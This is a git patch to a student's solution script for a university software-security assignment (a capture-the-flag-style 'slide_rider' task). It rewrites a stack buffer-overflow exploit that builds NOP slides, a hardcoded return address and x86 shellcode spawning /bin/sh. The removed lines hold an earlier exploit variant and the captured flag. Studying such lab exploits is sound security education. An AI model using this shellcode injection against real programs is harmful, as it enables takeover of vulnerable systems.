From fa4873f427c81aa98994c9fc9046c7d206388bd9 Mon Sep 17 00:00:00 2001 From: Paul Zinselmeyer Date: Sun, 23 Jun 2024 18:05:53 +0200 Subject: [PATCH] [Assignment-6] Task 6b solution.sh --- .../slide_rider/solution.sh | 24 ++++++++----------- 1 file changed, 10 insertions(+), 14 deletions(-) diff --git a/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh index 80fe801..4edbe83 100755 --- a/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh +++ b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh @@ -1,16 +1,12 @@ -#!/bin/bash +#!/usr/bin/env sh -# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/ +# slide for buffer size 20 + 2 bytes of saved ebp +SLIDE_1=$(printf "\\\\x90%.0s" $(seq 1 22)) +# jump over the ret addr +JMP_OVER_RET="\xeb\x04" +RET_ADDR="\x08\xdc\xff\xff" +# main nop slide (500 Bytes) +SLIDE_2=$(printf "\\\\x90%.0s" $(seq 1 500)) +SHELLCODE="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80" -# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN} - -######### Exploit ######### -# Step 1: Fill the buffer with a candidate return address -printf "\x0c\xd6\xff\xff%.0s" {1..30} - -# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode -printf "\x90%.0s" {1..2000} - -# Step 3: Write the provided shellcode to stdout -printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" -########################### +printf $SLIDE_1$JMP_OVER_RET$RET_ADDR$SLIDE_2$SHELLCODE